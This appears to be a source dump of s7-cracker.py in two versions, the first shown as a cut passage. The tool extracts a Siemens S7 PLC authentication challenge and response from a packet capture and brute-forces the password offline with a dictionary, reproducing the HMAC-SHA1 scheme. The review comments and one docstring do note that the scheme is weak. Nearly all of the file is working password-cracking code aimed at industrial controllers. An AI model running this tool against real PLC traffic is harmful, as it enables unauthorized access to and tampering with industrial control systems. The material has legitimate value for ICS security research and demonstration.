    # necessarily packet order, and ``pckt_108`` stays 0 (i.e. packet 0) if
    # nothing matches -- there is no "not found" check.
    pckt_108 = 0 #challenge packet (from server)
    for (pckt_indx, pckt_len) in pckt_lens.items():
        if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732':
            pckt_108 = pckt_indx
            break

    # try to find response packet
    # Restrict the search to packets at or after the challenge.  The slice
    # is positional on the key list, which equals the index only if the
    # dict yields its integer keys in ascending order (typical for 0..n in
    # Py2, but not guaranteed).
    pckt_141 = 0 #response packet (from client)
    _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831':
            pckt_141 = pckt_indx
            break

    # try to find auth result packet
    # Only ``pckt_84`` (auth ok) is acted on below; ``pckt_92`` feeds the
    # diagnostic print only.  The search starts at the challenge rather
    # than after the response, so an earlier result frame in the same
    # window would be picked up first.
    pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
    pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32':
            pckt_84 = pckt_indx
            break
        if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732':
            pckt_92 = pckt_indx
            break

    print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
    # A failed login in the capture gives no usable reference response.
    if pckt_84:
        print "auth ok"
    else:
        print "auth bad. for brute we need right auth result. exit"
        sys.exit()

    challenge = None
    response = None

    # Challenge: hex offsets 46..52 must hold the '100214' tag and 92..94
    # must be 00; the 40 hex chars in between are the 20-byte challenge.
    raw_challenge = hexlify(r[pckt_108].load)
    if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
        challenge = raw_challenge[52:92]
        print "found challenge: %s" % challenge
    else:
        print "cannot find challenge. exit"
        sys.exit()

    # Response: same tag/terminator layout at a later offset; the 40 hex
    # chars are the 20-byte value that calculate_s7response reproduces.
    raw_response = hexlify(r[pckt_141].load)
    if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
        response = raw_response[70:110]
        print "found response: %s" % response
    else:
        print "cannot find response. exit"
        sys.exit()

    return challenge, response
88 |
def calculate_s7response(password, challenge):
    """Compute the expected S7 auth response for ``password``.

    ``challenge`` is the 40-character hex string carved by
    get_challenge_response; it is decoded to its 20 raw bytes with the
    Py2 ``str`` ``hex`` codec.  The result is HMAC-SHA1 keyed with
    SHA1(password) over those bytes, returned as a 40-character hex digest
    -- the same form as the captured response, so the two compare directly.

    The key is a single, unsalted SHA1 of the password, so one captured
    challenge/response pair is enough to check guesses offline.  This is
    why the S7 password on its own is a weak control: the engineering/auth
    traffic path needs network-level access restriction and monitoring.
    """
    challenge = challenge.decode("hex")
    return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest()
92 |
if __name__ == '__main__':
    # Entry point: carve the reference pair from the capture named by the
    # module-level cfg_* constants, then compare every dictionary line
    # against it and stop at the first match.
    print "using pcap file: %s" % cfg_pcap_file
    challenge, response = get_challenge_response()
    print "start password bruteforsing ..."
    # NOTE(review): the dictionary handle is never closed, and ``strip()``
    # also removes leading/trailing spaces that may be part of a candidate.
    for p in open(cfg_dictionary_file):
        p = p.strip()
        if response == calculate_s7response(p, challenge):
            print "found password: %s" % p
            sys.exit()
    print "password not found. try another dictionary."
--------------------------------------------------------------------------------
/source/s7-cracker.py:
--------------------------------------------------------------------------------
1 | """
2 | As posted on: http://pastebin.com/0G9Q2k6y
3 |
4 | File: s7-cracker.py
5 | Desc: offline password brute-forcing based on challenge-response data, extracted from an auth traffic dump file
6 |
7 | Installing (scapy) pcapy on Windows for Python 2.7:
8 |
9 | See: http://stackoverflow.com/a/23279252
10 |
11 | Download and install http://dirk-loss.de/scapy/dnet-1.12.win32-py2.7.exe and http://code.google.com/p/pypcap/issues/detail?id=36
12 |
13 |
14 |
15 | Original authors:
16 |
17 | Alexander Timorin, Dmitry Sklyarov
18 | http://scadastrangelove.org
19 |
20 | As posted on: http://pastebin.com/0G9Q2k6y
21 |
22 | Version: 0.1 (just for demo, don't kick my ass plz)
23 | """
24 |
25 | import argparse
26 | import sys
27 | import hashlib
28 | import hmac
29 | from binascii import hexlify
30 |
31 | try:
32 | from scapy.all import *
33 | except ImportError:
34 | print "please install scapy: http://www.secdev.org/projects/scapy/ "
35 | sys.exit()
36 |
37 |
def get_challenge_response(cfg_pcap_file):
    """Locate the S7 auth challenge/response pair in ``cfg_pcap_file``.

    Args:
        cfg_pcap_file: path of the capture to read with scapy's ``rdpcap``.

    Identifies three frames by their on-wire length and a 5-byte marker in
    the raw payload (``.load``): the challenge from the PLC, the client's
    response, and the PLC's auth result.  Returns ``(challenge, response)``
    as 40-character hex strings (20 bytes each).  Calls ``sys.exit()`` when
    the auth result is not the "ok" frame or when either value cannot be
    carved out.

    Python 2 only: relies on ``map`` returning a list, ``dict.keys()``
    returning a sliceable list, and ``hexlify`` returning ``str`` so the
    literal comparisons below can match.
    """
    r = rdpcap(cfg_pcap_file)

    # Per-packet length as reported by scapy, keyed by packet index.
    lens = map(lambda x: x.len, r)
    pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

    # try to find challenge packet
    # Match on length (``.len`` + 14 -- presumably the link-layer header is
    # not included in ``.len``; TODO confirm) and on payload bytes 7..11
    # read as hex.  NOTE(review): iteration follows the Py2 dict order, not
    # necessarily packet order, and ``pckt_108`` stays 0 (i.e. packet 0) if
    # nothing matches -- there is no "not found" check.
    pckt_108 = 0 #challenge packet (from server)
    for (pckt_indx, pckt_len) in pckt_lens.items():
        if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732':
            pckt_108 = pckt_indx
            break

    # try to find response packet
    # Restrict the search to packets at or after the challenge.  The slice
    # is positional on the key list, which equals the index only if the
    # dict yields its integer keys in ascending order (typical for 0..n in
    # Py2, but not guaranteed).
    pckt_141 = 0 #response packet (from client)
    _t1 = dict([ (i, lens[i]) for i in pckt_lens.keys()[pckt_108:] ])
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 141 and hexlify(r[pckt_indx].load)[14:24] == '7202004831':
            pckt_141 = pckt_indx
            break

    # try to find auth result packet
    # Only ``pckt_84`` (auth ok) is acted on below; ``pckt_92`` feeds the
    # diagnostic print only.  The search starts at the challenge rather
    # than after the response, so an earlier result frame in the same
    # window would be picked up first.
    pckt_84 = 0 # auth answer from plc: pckt_len==84 -> auth ok
    pckt_92 = 0 # auth answer from plc: pckt_len==92 -> auth bad
    for pckt_indx in sorted(_t1.keys()):
        pckt_len = _t1[pckt_indx]
        if pckt_len+14 == 84 and hexlify(r[pckt_indx].load)[14:24] == '7202000f32':
            pckt_84 = pckt_indx
            break
        if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] == '7202001732':
            pckt_92 = pckt_indx
            break

    print "found packets indeces: pckt_108=%d, pckt_141=%d, pckt_84=%d, pckt_92=%d" % (pckt_108, pckt_141, pckt_84, pckt_92)
    # A failed login in the capture gives no usable reference response.
    if pckt_84:
        print "auth ok"
    else:
        print "auth bad. for brute we need right auth result. exit"
        sys.exit()

    challenge = None
    response = None

    # Challenge: hex offsets 46..52 must hold the '100214' tag and 92..94
    # must be 00; the 40 hex chars in between are the 20-byte challenge.
    raw_challenge = hexlify(r[pckt_108].load)
    if raw_challenge[46:52] == '100214' and raw_challenge[92:94] == '00':
        challenge = raw_challenge[52:92]
        print "found challenge: %s" % challenge
    else:
        print "cannot find challenge. exit"
        sys.exit()

    # Response: same tag/terminator layout at a later offset; the 40 hex
    # chars are the 20-byte value that calculate_s7response reproduces.
    raw_response = hexlify(r[pckt_141].load)
    if raw_response[64:70] == '100214' and raw_response[110:112] == '00':
        response = raw_response[70:110]
        print "found response: %s" % response
    else:
        print "cannot find response. exit"
        sys.exit()

    return challenge, response
99 |
def calculate_s7response(password, challenge):
    """Compute the expected S7 auth response for ``password``.

    ``challenge`` is the 40-character hex string carved by
    get_challenge_response; it is decoded to its 20 raw bytes with the
    Py2 ``str`` ``hex`` codec.  The result is HMAC-SHA1 keyed with
    SHA1(password) over those bytes, returned as a 40-character hex digest
    -- the same form as the captured response, so the two compare directly.

    The key is a single, unsalted SHA1 of the password, so one captured
    challenge/response pair is enough to check guesses offline.  This is
    why the S7 password on its own is a weak control: the engineering/auth
    traffic path needs network-level access restriction and monitoring.
    """
    challenge = challenge.decode("hex")
    return hmac.new( hashlib.sha1(password).digest(), challenge, hashlib.sha1).hexdigest()
103 |
if __name__ == '__main__':

    # Entry point: two positional arguments, the capture and the wordlist
    # (``type=str`` is argparse's default and could be dropped).
    parser = argparse.ArgumentParser(description='Crack S7 password using a dictionary')
    parser.add_argument('file', metavar='FILE', type=str, help='A PCAP file containing S7 traffic')
    parser.add_argument('dict', metavar='DICT', type=str, help='Dictionary to use when cracking')
    args = parser.parse_args()

    # Carve the reference pair from the capture, then compare every
    # dictionary line against it and stop at the first match.
    print "using pcap file: %s" % args.file
    challenge, response = get_challenge_response(args.file)
    print "start password bruteforsing ..."
    # NOTE(review): the dictionary handle is never closed, and ``strip()``
    # also removes leading/trailing spaces that may be part of a candidate.
    for p in open(args.dict):
        p = p.strip()
        if response == calculate_s7response(p, challenge):
            print "found password: %s" % p
            sys.exit()
    print "password not found. try another dictionary."
--------------------------------------------------------------------------------